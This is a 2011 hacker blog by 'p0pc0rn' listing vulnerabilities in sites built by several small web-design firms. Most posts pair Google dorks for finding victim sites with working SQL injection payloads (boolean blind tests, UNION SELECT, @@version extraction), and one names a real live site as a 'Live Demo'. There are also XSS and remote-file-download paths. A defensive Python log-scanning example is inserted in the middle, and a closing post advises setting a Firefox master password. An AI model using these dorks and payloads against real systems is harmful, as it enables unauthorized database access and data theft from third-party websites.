Saturday, April 30, 2011

PakCyber Web Design Multiple Vulnerabilities


Title : PakCyber Web Design Multiple Vulnerabilities
Found : by p0pc0rn
Vendor: http://pakcyber.com/
Dork : intext:"Powered By PakCyber"


Blind SQL Injection
-------------------

http://www.victim.com/site.php?article_id=[Blindey]
Eg:
http://www.victim.com/full_article_text.php?article_id=808 and 1=1 TRUE
http://www.victim.com/full_article_text.php?article_id=808 and 1=2 FALSE

http://www.victim2.com/site.php?cid=[Blindey]
Eg:
http://www.victim2.com/university.php?cid=8 or 1=1-- TRUE
http://www.victim2.com/university.php?cid=8 or 1=2-- FALSE



http://www.victim3.com/site.php?CatId=[Blindey]
Eg:
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=1-- TRUE
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=2-- FALSE

More parameters still need to be checked. There is a high possibility that they are vulnerable to SQL injection too.

Cross Site Scripting
--------------------
http://www.victim.com/CategoryDetails.php?CatId=44&CatName=[XSS]

thanks,
#p0pc0rn#

Friday, April 15, 2011

ezeXs Web Design Vulnerable to SQL Injection


Title : ezeXs Web Design Vulnerable to SQL Injection
Web : http://www.ezexs.com/
By : p0pc0rn
Dork : intext:"Powered by ezexs.com"


Microsoft Access SQL Injection
------------------------------

http://site.com/[type].asp?[id]=[SQL]

Notes : All parameters can potentially be injected.

POC
---

http://site.com/product_detail.asp?Id=57 union select 1 from test.a
http://site.com/category.asp?Id=49 union select 1 from test.a



more out there.

thanks,
-p0pc0rn-

Site Developed by Magfiroh Vulnerable to SQL Injection


Title : Site Developed by Magfiroh Vulnerable to SQL Injection
Filetype : ColdFusion
Found by : p0pc0rn
Dork : inurl:".cfm?judul="


SQL
---

http://site.com/parameter.cfm?judul=[SQL]

POC
---

http://site.com/download_detail.cfm?judul=1'

Live Demo
---------

http://www.stiabinabanua.ac.id/download_detail.cfm?judul=30 UNION SELECT 1,2,version(),user(),5,6--



thanks,
-p0pc0rn-

Tuesday, April 5, 2011

eksi7 Web Design Vulnerable to Multiple SQL Injection


Title : eksi7 Web Design Vulnerable to Multiple SQL Injection
Vendor: http://www.eksi7.com
Found by : p0pc0rn
Dork :
inurl:"devam.asp?haber_id="
inurl:"kat_list.asp?kat_id="
intext:"tasarim ve programlama eksi7 web hizmetleri"
intext:"design and programming eksi7 web services"


MSSQL
-----
http://site.com/path/haber/devam.asp?haber_id=[MSSQL]

POC
---
http://site.com/v4/haber/devam.asp?haber_id=7927+and+1=@@version


JetDatabase
-----------
http://site.com/path/haber/devam.asp?haber_id=[SQL]
http://site.com/path/icerik/kat_list.asp?kat_id=[SQL]

POC
---
http://site.com/abana/haber/devam.asp?haber_id=460 UnIoN SelECt 1 from test.a
http://site.com/rozey/icerik/kat_list.asp?kat_id=7 unIoN SelEct 1 from test.a


thanks,
-p0pc0rn-
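
For defenders reviewing their own logs for the probes shown in the SQL injection advisories above, the following is an added example (not part of the original posts) that flags requests where one of the numeric id parameters carries anything other than digits. The log lines are constructed, and treating every listed parameter as integer-only is an assumption; the same check, applied server-side before the query is built, is also the fix.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisories above use as numeric record ids (lower-cased).
# Assumption: on these sites the legitimate value is always a plain integer.
ID_PARAMS = {"article_id", "cid", "catid", "id", "haber_id", "kat_id", "judul"}

# Client address and request target from a Common Log Format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

# Constructed sample log (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '198.51.100.7 - - [30/Apr/2011:10:00:01 +0000] "GET /full_article_text.php?article_id=808 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/Apr/2011:10:02:11 +0000] "GET /full_article_text.php?article_id=808%20and%201=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/Apr/2011:10:02:12 +0000] "GET /full_article_text.php?article_id=808%20and%201=2 HTTP/1.1" 200 312',
    '203.0.113.9 - - [30/Apr/2011:10:03:40 +0000] "GET /haber/devam.asp?haber_id=7927+and+1=@@version HTTP/1.1" 500 1208',
]


def non_integer_ids(target):
    """Return (name, decoded value) for each id parameter that is not all digits."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query):
        if name.lower() in ID_PARAMS and not re.fullmatch(r"[0-9]+", value):
            hits.append((name, value))
    return hits


def scan(lines):
    """Group rejected id values by (client, path, parameter)."""
    findings = defaultdict(list)
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        client, target = match.groups()
        for name, value in non_integer_ids(target):
            findings[(client, urlsplit(target).path, name)].append(value)
    return dict(findings)


if __name__ == "__main__":
    for (client, path, name), values in scan(SAMPLE_LOG).items():
        # Two or more rejected values on one parameter is the TRUE/FALSE probing pattern.
        label = "repeated probing" if len(values) > 1 else "single anomaly"
        print(f"{client} {path} {name}: {label}: {values}")
```
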

Monday, April 4, 2011

Autonics Corporation Websites Vulnerable to Remote File Download

Title : Autonics Corporation Websites Vulnerable to Remote File Download
Found by : p0pc0rn
Dork : inurl:"download.php?bo_code=data"

POC
---
http://site.com/board/download.php?bo_code=data&filename=[remote file download]

* -------------------------------------------------------------------------
* @Creator Psyche Lee
* @version 1.0
* @date 2007-11-22
* -------------------------------------------------------------------------
* Copyright 2007 by Psyche Lee
* -------------------------------------------------------------------------
****more****

thanks,
-p0pc0rn-

Sunday, April 3, 2011

Master Password in Firefox


Master Password in Firefox
--------------------------


Some of us may have stored passwords for some sites in our browser, so
it's really important to set a master password in the Firefox browser.
Why do we need to set the master password?
Because if an attacker gets physical access to our computer, for example, they can view our stored passwords at

Tools > Options > Security > Saved Password > Show Password


Dangerous meh?!

What you need to do is simple: just set the master password

Tools > Options > Security > Master Password



Then, each time someone attempts to view the saved passwords, Firefox will ask for the master password first. The same happens if someone tries to browse to one of your favourite websites for which you have stored a password in the browser: Firefox will ask for the master password first.


Have a try.

Thanks
-p0pc0rn-